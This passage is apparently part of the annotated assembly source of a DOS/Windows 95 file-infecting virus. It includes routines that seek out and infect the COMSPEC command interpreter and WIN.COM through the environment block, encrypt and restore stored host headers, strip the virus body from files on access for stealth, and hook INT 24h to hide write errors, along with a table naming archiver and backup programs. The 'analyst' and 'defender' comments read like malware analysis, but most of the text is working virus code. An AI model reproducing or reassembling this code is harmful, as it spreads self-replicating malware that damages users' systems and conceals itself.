CMP SI, DX ; No path was supplied?
JA Offset_OK
Adjust_DI: MOV SI, DX ; Then adjust DI.
Offset_OK: MOV DI, OFFSET Filename_Buffer
MOV CX, 12
PUSH DI
CLD
Conv_Filename: LODSB
CALL Make_Uppercase
STOSB
LOOP Conv_Filename
POP DI
POP SI
Comp_Filename: SEGCS
LODSB
CBW
XCHG CX, AX
CMP CX, DI ; NZ
JCXZ Exit_Scan_Line
PUSHA
SEGCS
REPE CMPSB
POPA
PUSHF
ADD SI, CX
POPF
JE Exit_Scan_Line
JMP Comp_Filename
Exit_Scan_Line: POPA
CLD
RETN
; --------------------------------------------------------------------------
; Crypt_Header -- XOR-transforms the 24 data bytes of an Encrypt_Header image
; word by word. The key stream depends only on Header_Key/Header_Slider and
; XOR is its own inverse, so the same routine both encrypts and decrypts.
; In:    DS:SI = Header (Encrypt_Header layout: 24 data bytes, then
;        Header_Key at offset 24 and Header_Slider at offset 26).
;        The destination is CS:SI, so the transform is in place only when
;        DS == CS (Read_Header sets DS = CS before Check_Clean calls this).
;        CH must already be 0 -- only CL is loaded below (caller-dependent;
;        Check_Clean arrives with CX = 40h from Read_Header).
; Out:   12 data words rewritten; key and slider copied through unchanged.
;        All general registers and ES are preserved (PUSHA / PUSH ES).
; Analyst note: per word, data ^= key; key = ror(key, n); key += slider,
;        where n is the remaining loop count (12 down to 1), i.e. the rotate
;        amount changes for every word.
; --------------------------------------------------------------------------
; DS:SI = Header.
Crypt_Header:
PUSHA
PUSH ES
PUSH CS
POP ES ; ES = CS: output is written into this code's own segment.
MOV DI, SI ; Same offset as the source.
MOV BX, [SI.Header_Key] ; Running key (Encrypt_Header offset 24).
MOV DX, [SI.Header_Slider] ; Constant added to the key after each word (offset 26).
MOV CL, (24 / 2) ; 12 words; CH is assumed to be 0 already.
Copy_Crypt_W: CLD
LODSW
XOR AX, BX
ROR BX, CL ; Rotate count is the remaining word count, so it varies per word.
ADD BX, DX
STOSW
LOOP Copy_Crypt_W
LODSW ; Header_Key: copied through unchanged.
STOSW
LODSW ; Header_Slider: copied through unchanged.
STOSW
POP ES
POPA
RETN
; Archivers -- name table consumed by the Comp_Filename loop above: each entry
; is a length byte followed by the name, and a 0 length byte ends the table.
; The scan compares entries against the uppercased Filename_Buffer and leaves
; ZF set on a match; what the caller does with the result is outside this view.
Archivers DB 09, 'PKZIP.EXE'
DB 07, 'ARJ.EXE'
DB 07, 'LHA.EXE'
DB 07, 'RAR.EXE'
DB 10, 'BACKUP.EXE'
DB 07, 'FTP.EXE'
DB 0 ; End of table.
; --------------------------------------------------------------------------
; Get_DTA -- INT 21h/2Fh (get DTA address) via the saved original vector.
; Out:   DS:BX = current DTA (DOS returns ES:BX; DS is then set equal to ES).
;        DX = 0 via CWD -- valid as long as bit 15 of AX is clear, which holds
;        if DOS leaves AX = 2F00h + Century untouched (assumed, not shown).
; Note:  Century is an assembler constant defined outside this view; DOS
;        selects the function by AH only, so folding Century into AL does not
;        change the call.
; Clobbers: AX, BX, DX, DS, ES, flags.
; --------------------------------------------------------------------------
Get_DTA:
MOV AX, 2F00h + Century
CALL OldInt21h
PUSH ES
POP DS ; DS = segment of the DTA.
CWD ; Zero DX.
RETN
; --------------------------------------------------------------------------
; Check_Clean -- removes the virus body from the open file in BX: reads the
; 28-byte Encrypt_Header image stored at EOF-28, runs Crypt_Header over it,
; writes the 24 original header bytes back (Write_Header), truncates the file
; by Virus_Size, then restores the file position and the date/time stamp.
; Under what condition the caller invokes this is outside this view.
; In:    BX = open file handle (passed through to every INT 21h call).
; Out:   all general registers, DS, ES and flags restored (PUSHF/PUSHA...POPF).
;        Nothing is written if Check_Handle reports a character device (SF)
;        or a failed call (CF).
; Uses:  OldInt21h, Save_File_Stamp/Restore_File_Stamp, Go_BOF, Virus_Size,
;        Century and File_Date -- all defined outside this view.
; Defender note: INT 24h is redirected to NewInt24h for the duration, so a
;        critical error (e.g. write-protected media) during the rewrite is
;        answered "fail" with no user prompt.
; --------------------------------------------------------------------------
Check_Clean:
PUSHF
PUSHA
PUSH DS
PUSH ES
CALL Hook_Int24h
CALL Check_Handle ; SF = character device; CF = a call inside it failed (see Check_Handle).
JS Exit_Clean_H
JB Exit_Clean_H
CALL Save_File_Pos ; Leaves CX = 0, which Seek_Header relies on.
CALL Seek_Header ; To EOF-28.
CALL Read_Header ; Its CF/ZF result is not checked here.
CALL Crypt_Header ; Header image in CS:Header is decoded in place.
CALL Write_Header ; 24 bytes back to the start of the file.
MOV AX, 4202h ; LSEEK from end, CX:DX = -Virus_Size.
MOV CX, -1
MOV DX, -Virus_Size
CALL OldInt21h
INC CX ; Cut-off virusbody. CX = 0: a zero-length write truncates at the current position.
CALL Write_File
CALL Restore_File_Pos
SUB BYTE PTR File_Date+1, Century ; Remove the marker from the year byte of the saved date stamp before it is written back.
CALL Restore_File_Stamp
Exit_Clean_H: CALL Unhook_Int24h
POP ES
POP DS
POPA
POPF
RETN
; --------------------------------------------------------------------------
; Hook_Int24h -- saves the current INT 24h (critical error) vector in Int24h
; and points the vector at NewInt24h. DS is set to CS for the 25h call so
; DS:DX addresses the handler in this segment.
; Out:   general registers and DS preserved (PUSHA / PUSH DS).
;        ES is NOT preserved: 35h returns the old handler's segment in ES
;        (Check_Clean saves ES around the call).
; --------------------------------------------------------------------------
Hook_Int24h:
PUSHA
PUSH DS
PUSH CS
POP DS
MOV AX, 3524h ; Get vector 24h -> ES:BX.
CALL OldInt21h
MOV Int24h, BX
MOV Int24h+2, ES
MOV AH, 25h ; Set vector 24h = DS:DX.
MOV DX, OFFSET NewInt24h
CALL OldInt21h
POP DS
POPA
RETN
; Unhook_Int24h -- restores the INT 24h vector saved by Hook_Int24h.
; Tail-jumps into OldInt21h, whose RETN returns to our caller.
; Clobbers: AX, DX, DS.
Unhook_Int24h:
MOV AX, 2524h ; Set vector 24h = DS:DX.
LDS DX, DWORD PTR CS:Int24h
JMP OldInt21h
; NewInt24h -- replacement critical-error handler: answers AL = 3 ("fail"),
; so DOS returns an error to the failing call instead of showing the
; Abort/Retry/Fail prompt. Defender note: installing this suppresses any
; visible sign of write failures while the hook is active.
NewInt24h:
MOV AL, 03h
IRET
; --------------------------------------------------------------------------
; Save_File_Pos -- records the current position of handle BX.
; LSEEK relative to current with offset 0 (CX = 0; CWD on AX = 4201h gives
; DX = 0) returns the position in DX:AX, which is stored into the immediate
; operands of Restore_File_Pos (File_Pos_Lo/File_Pos_Hi label those operand
; bytes -- self-modifying code, written through CS).
; Out:   AX, DX, flags from the call; CX = 0.
; --------------------------------------------------------------------------
Save_File_Pos:
MOV AX, 4201h
XOR CX, CX
CWD ; DX = 0 (AX is positive).
CALL OldInt21h
MOV CS:File_Pos_Lo, AX ; Patch the MOV DX immediate in Restore_File_Pos.
MOV CS:File_Pos_Hi, DX ; Patch the MOV CX immediate in Restore_File_Pos.
RETN
; --------------------------------------------------------------------------
; Restore_File_Pos -- seeks handle BX back to the position Save_File_Pos
; recorded. The two MOV immediates below are patched in place: each
; "= WORD PTR $-2" line aliases the two operand bytes of the preceding MOV.
; Tail-jumps into OldInt21h. Clobbers: AX, CX, DX, flags.
; --------------------------------------------------------------------------
Restore_File_Pos:
MOV AX, 4200h ; LSEEK from start, CX:DX = saved position.
MOV CX, 0 ; Immediate is overwritten by Save_File_Pos.
File_Pos_Hi = WORD PTR $-2
MOV DX, 0 ; Immediate is overwritten by Save_File_Pos.
File_Pos_Lo = WORD PTR $-2
JMP OldInt21h
; Seek_Header -- seeks handle BX to EOF-28 (28 = size of Encrypt_Header).
; Requires CX = 0 on entry so that DEC CX yields -1, the sign extension of
; -28 in CX:DX (Check_Clean calls it right after Save_File_Pos, which zeroes CX).
; Tail-jumps into OldInt21h. Clobbers: AX, CX, DX, flags.
Seek_Header:
MOV AX, 4202h ; LSEEK from end.
DEC CX ; CX = -1 only if the caller left CX = 0.
MOV DX, -28
JMP OldInt21h
; --------------------------------------------------------------------------
; Read_Header -- reads up to 40h bytes from handle BX into CS:Header.
; Out:   DS = CS, SI = OFFSET Header, CX = 40h (so CH = 0 for the callers
;        that only load CL afterwards); AX = bytes read.
;        CF set on a DOS error; otherwise ZF set iff exactly 40h bytes were read.
; Note:  after Seek_Header only 28 bytes remain, so AX = 28 and ZF is clear in
;        the Check_Clean flow; Check_Clean does not test the result.
; --------------------------------------------------------------------------
Read_Header:
PUSH CS
POP DS
MOV SI, OFFSET Header
MOV CX, 40h ; Buffer size; the image actually used is the first 28 bytes.
MOV DX, SI
CALL Read_File
JC Exit_Read_Hdr
CMP AX, CX ; ZF = full buffer read.
Exit_Read_Hdr: RETN
; Read_File -- INT 21h/3Fh via the saved vector: BX = handle, CX = byte
; count, DS:DX = buffer. Returns AX = bytes read, CF set on error.
; Tail-jumps into OldInt21h.
Read_File:
MOV AH, 3Fh
JMP OldInt21h
; --------------------------------------------------------------------------
; Write_Header -- writes the 24 decoded header bytes at DS:SI to handle BX
; after Go_BOF (defined outside this view; presumably seeks to offset 0).
; CH must be 0: only CL is loaded here (Read_Header leaves CX = 40h).
; Write_File is a second entry used for the truncating write in Check_Clean:
; INT 21h/40h with BX = handle, CX = count, DS:DX = data; CF set on error.
; Both tail-jump into OldInt21h.
; --------------------------------------------------------------------------
Write_Header:
CALL Go_BOF
MOV CL, 24 ; Write updated header.
MOV DX, SI
Write_File: MOV AH, 40h
JMP OldInt21h
; Converts characters in AX to uppercase.
; Make_Uppercase -- maps 'a'..'z' to 'A'..'Z' independently in AL and AH;
; any other byte value is left unchanged. Clobbers flags only.
Make_Uppercase:
CMP AL, 'a'
JB Check_Upper_AH
CMP AL, 'z'
JA Check_Upper_AH
SUB AL, 'a' - 'A' ; 20h.
Check_Upper_AH: CMP AH, 'a'
JB Exit_Uppercase
CMP AH, 'z'
JA Exit_Uppercase
SUB AH, 'a' - 'A'
Exit_Uppercase: RETN
; --------------------------------------------------------------------------
; Check_Handle -- IOCTL 4400h (get device information) on handle BX.
; Out:   SF set (and SI = 0) when DL bit 7 is set, i.e. the handle is a
;        character device rather than a file; the routine exits without
;        touching anything else.
;        For a file: Save_File_Stamp (outside this view) is called, SI = 1 and
;        BP = SP + 2 = address of the caller's saved-register frame -- this
;        matches the Push_All_Stack layout when the caller did
;        PUSHF/PUSHA/PUSH DS/PUSH ES as Check_Clean does (apparent intent).
;        CF: cleared by OR DL,DL, so a set CF on exit can only come from
;        Save_File_Stamp (inferred; INC does not affect CF).
; Clobbers: AX, DX, SI, BP, flags.
; --------------------------------------------------------------------------
Check_Handle:
XOR SI, SI
MOV AX, 4400h
CALL OldInt21h
OR DL, DL ; Bit 7 of DL: character device.
JS Exit_Chk_File
CALL Save_File_Stamp
MOV BP, SP
INC BP
INC BP ; BP -> first word pushed by the caller (Reg_ES in Push_All_Stack).
INC SI ; SI = 1: regular file.
Exit_Chk_File: RETN
; --------------------------------------------------------------------------
; Infect_ComSpec -- walks the environment block of the current PSP
; (PSP:2Ch holds the environment segment) and, for the COMSPEC= and WINDIR=
; variables, opens the named file read-only with INT 21h/3Dh through the
; live vector (not OldInt21h). The original comments state that the open
; itself infects, presumably via this program's own INT 21h handler, which is
; outside this view. Defender note: the files targeted here are the command
; interpreter named by COMSPEC and <WINDIR>\WIN.COM.
; In:    DS = this code's segment (ES is copied from DS and later used to
;        address Filename_Buffer and Win95_Init) -- assumed, not set here.
;        CL = 0: used as the end-of-environment test and not set here
;        (the REP MOVSB below leaves CX = 0 again on the WINDIR path).
; Out:   general registers restored (PUSHA); DS, ES and flags clobbered.
; Notes: the handles returned by both opens are not closed in this routine.
;        The WINDIR value is copied with no length check against the 32-byte
;        Filename_Buffer.
; --------------------------------------------------------------------------
Infect_ComSpec:
PUSHA
PUSH DS
POP ES ; ES = DS (expected to be this code's segment).
MOV AH, 62h ; Get current PSP.
INT 21h
XOR SI, SI
MOV DS, BX
MOV DS, DS:[SI+2Ch] ; PSP+2Ch = environment segment.
Comp_Env_Var: CMP DS:[SI], CL ; End of settings reached? (Empty string; CL expected to be 0.)
JZ Exit_Inf_ComSpec
MOV AX, DS:[SI+5] ; Characters 5 and 6 of the variable.
CALL Make_Uppercase
XCHG BX, AX
MOV AX, DS:[SI]
CALL Make_Uppercase
CMP AX, 'OC' ; Look for 'COMSPEC='. (AL='C', AH='O'; BX must be 'E','C' = characters 5,6.)
JNE Test_4_Win_Dir
CMP BX, 'CE'
JNE Test_4_Win_Dir
Found_ComSpec: MOV AX, 3D00h ; Infect command-interpreter. Open read-only; the path starts after "COMSPEC=".
LEA DX, [SI+8]
INT 21h ; Live vector. AX now holds the handle or error code, so the 'IW' test below falls through.
Test_4_Win_Dir: CMP AX, 'IW' ; Look for 'WINDIR='. (AL='W', AH='I'; BX must be 'R','=' = characters 5,6.)
JNE Get_Next_Var
CMP BX, '=R'
JNE Get_Next_Var
PUSH SI
ADD SI, 7 ; Value after "WINDIR=".
MOV DI, OFFSET Filename_Buffer
MOV DX, DI ; DS:DX for the open below (DS = ES by then).
Copy_Byte_W_D: CLD
LODSB
OR AL, AL
JZ Win_Dir_Copied ; Stop at the NUL; AL = 0 is kept for the 3D00h open below.
STOSB
JMP Copy_Byte_W_D
Win_Dir_Copied: PUSH DS
PUSH ES
POP DS ; DS = ES = this code's segment.
MOV SI, OFFSET Win95_Init ; Append '\WIN.COM',0 (9 bytes incl. NUL).
MOV CL, 9 ; CH assumed 0; REP leaves CX = 0 for the loop test above.
REP MOVSB
MOV AH, 3Dh ; Infect WIN.COM. AL = 0 from the NUL above: open read-only.
INT 21h ; Live vector.
POP DS
POP SI
Get_Next_Var: CLD
Find_Next_Var: LODSB
OR AL, AL
JNZ Find_Next_Var ; Skip to the byte after this variable's NUL.
JMP Comp_Env_Var
Exit_Inf_ComSpec:
POPA
RETN
DB 0EAh ; Stray byte ahead of the label (0EAh is the JMP FAR opcode); not reached by code in this view, purpose not evident here.
; Check_4_EXE -- ZF set when the word at DS:SI (EXE_Mark, offset 0) is "MZ"
; ('ZM' as a little-endian word). Only "MZ" is accepted; the "ZM" variant
; mentioned at the EXE_Header definition is not tested. Clobbers flags only.
Check_4_EXE:
CMP [SI.EXE_Mark], 'ZM'
RETN
Win95_Init DB '\WIN.COM', 0 ; 9 bytes incl. NUL; appended to the WINDIR value by Infect_ComSpec.
IF (($ - Start) MOD 2) EQ 1 ; Pad to an even size (the Crypt routines work word-wise). Start is defined outside this view.
DB 0
ENDIF
End_Encrypted: ; Presumably the end of the region stored encrypted in files.
; Host_Bytes -- 28-byte Encrypt_Header image carried at the end of the body:
; the first 24 bytes of the host (here a minimal EXE header whose Program_IP,
; word 10, points at the Carrier stub below) followed by Header_Key and
; Header_Slider (both 0 in this seed copy). Check_Clean reads this image from
; EOF-28 and writes the 24 header bytes back; a cleaner can use the same
; layout to recover a host.
Host_Bytes DW 'ZM' ; EXE_Mark "MZ".
DW 0 ; Image_Mod_512
DW 0 ; Image_512_Pages
DW 0 ; Reloc_Items
DW 0 ; Header_Size_Mem
DW 0 ; Min_Size_Mem
DW 0 ; Max_Size_Mem
DW 0 ; Program_SS
DW 0 ; Program_SP
DW 0 ; Checksum
DW OFFSET Carrier ; Program_IP: the seed "host" entry point is Carrier.
DW 0 ; Program_CS
DW 0 ; Header_Key
DW 0 ; Header_Slider
Virus_End: ; Presumably the end of the part written to files; below is a memory-only work area.
Int24h DW 0, 0 ; Saved INT 24h vector: offset, segment.
File_Name DW 0, 0
Header DB 40h DUP(0) ; Read_Header target; Crypt_Header transforms its first 28 bytes.
Filename_Buffer DB 32 DUP(0) ; Uppercased name for the Archivers scan; WINDIR path in Infect_ComSpec.
Buffer DB Virus_Size DUP(0) ; Virus_Size is defined outside this view.
Virus_End_Mem:
; Carrier -- the seed host program: terminates with INT 21h/4Ch, exit code 0.
Carrier:
MOV AX, 4C00h
INT 21h
; ------------- SOME STRUCTURES ---------------------------------------------
; COM_Header -- the first 3 bytes of a .COM file as a near-jump: opcode byte
; plus 16-bit displacement.
COM_Header STRUC
Jump DB 0 ; Opcode byte.
Displacement DW 0 ; Near-jump displacement following it.
COM_Header ENDS
; EXE_Header -- the standard 26-byte DOS MZ header (13 words).
EXE_Header STRUC
EXE_Mark DW 0 ; Marker valid .EXE-file: MZ or ZM. (Check_4_EXE tests only "MZ".)
Image_Mod_512 DW 0 ; Bytes in the last 512-byte page.
Image_512_Pages DW 0 ; File size in 512-byte pages.
Reloc_Items DW 0 ; Number of relocation entries.
Header_Size_Mem DW 0 ; Header size in paragraphs.
Min_Size_Mem DW 0 ; Minimum extra paragraphs.
Max_Size_Mem DW 0 ; Maximum extra paragraphs.
Program_SS DW 0 ; Initial SS (relative).
Program_SP DW 0 ; Initial SP.
Checksum DW 0
Program_IP DW 0 ; Initial IP.
Program_CS DW 0 ; Initial CS (relative).
Reloc_Table DW 0 ; Offset of the relocation table.
EXE_Header ENDS
; Encrypt_Header -- 28-byte image stored at EOF-28 of a carrier: the host's
; original first 24 bytes, then the key and slider used by Crypt_Header.
Encrypt_Header STRUC
DB 24 DUP(0) ; Saved original header bytes (transformed by Crypt_Header).
Header_Key DW 0 ; Initial XOR key (offset 24).
Header_Slider DW 0 ; Added to the key after every word (offset 26).
Encrypt_Header ENDS
; Find_FN_Handle -- DTA layout filled by INT 21h/4Eh,4Fh (FindFirst/FindNext).
Find_FN_Handle STRUC
Handle_Reserved DB 21 DUP(0) ; Used by DOS to continue the search.
Handle_Attr DB 0 ; File attribute.
Handle_Time DW 0 ; DOS time.
Handle_Date DW 0 ; DOS date.
Handle_Size DW 0, 0 ; 32-bit size, low word first.
Handle_Name DW 6 DUP(0) ; ASCIIZ 8.3 name (13 bytes with the byte below).
DB 0
Find_FN_Handle ENDS
; Find_FN_FCB -- directory entry as returned by the FCB find functions.
Find_FN_FCB STRUC
FCB_Drive DB 0
FCB_Name DB 8 DUP(0) ; Name, blank-padded.
FCB_Ext DB 3 DUP(0) ; Extension, blank-padded.
FCB_Attr DB 0
FCB_Reserved DB 10 DUP(0)
FCB_Time DW 0
FCB_Date DW 0
FCB_Start_Clust DW 0
FCB_Size DW 0, 0 ; 32-bit size, low word first.
Find_FN_FCB ENDS
; Push_All_Stack -- stack frame after PUSHF / PUSHA / PUSH DS / PUSH ES, from
; the lowest address up (PUSHA pushes AX,CX,DX,BX,SP,BP,SI,DI in that order).
; Check_Clean builds exactly this frame; Check_Handle leaves BP pointing at it.
Push_All_Stack STRUC
Reg_ES DW 0
Reg_DS DW 0
Reg_DI DW 0
Reg_SI DW 0
Reg_BP DW 0
Reg_SP DW 0 ; Value of SP before the PUSHA.
Reg_BX DW 0
Reg_DX DW 0
Reg_CX DW 0
Reg_AX DW 0
Reg_Flags DW 0
Reg_Ret_Addr DW 0 ; Return address of the CALL that preceded the pushes.
Push_All_Stack ENDS
; Find_FN_Win95 -- LFN find data (INT 21h/714Eh,714Fh), WIN32_FIND_DATA layout.
; Win95_Time/Win95_Date read the last-write stamp as DOS time/date words,
; which only holds when the call was asked for DOS-format times (assumed here).
Find_FN_Win95 STRUC
Win95_Attr DD 0 ; File attributes.
Win95_Created DD 0, 0 ; Creation time (8 bytes).
Win95_Access DD 0, 0 ; Last access time (8 bytes).
Win95_Time DW 0 ; Last write: DOS time word.
Win95_Date DW 0 ; Last write: DOS date word.
DD 0 ; Remaining 4 bytes of the last-write stamp.
Win95_Size_Hi DD 0
Win95_Size_Lo DD 0
Win95_Reserved DB 8 DUP(0)
Win95_Win_Name DB 260 DUP(0) ; Long name, ASCIIZ.
Win95_DOS_Name DB 14 DUP(0) ; Short 8.3 alias, ASCIIZ.
Find_FN_Win95 ENDS
; MCB_Header -- DOS memory control block (the paragraph preceding each allocation).
MCB_Header STRUC
MCB_Type DB 0 ; M = not last block, Z = last block.
MCB_PSP DW 0 ; PSP-segment of this block.
MCB_Size_Mem DW 0 ; Size of block in paragraphs.
MCB_Dunno DB 3 DUP(0) ; Don't care, don't need it.
MCB_Program DW 4 DUP(0) ; Filename of program of this block.
MCB_Header ENDS
END START ; Entry point Start is defined outside this view.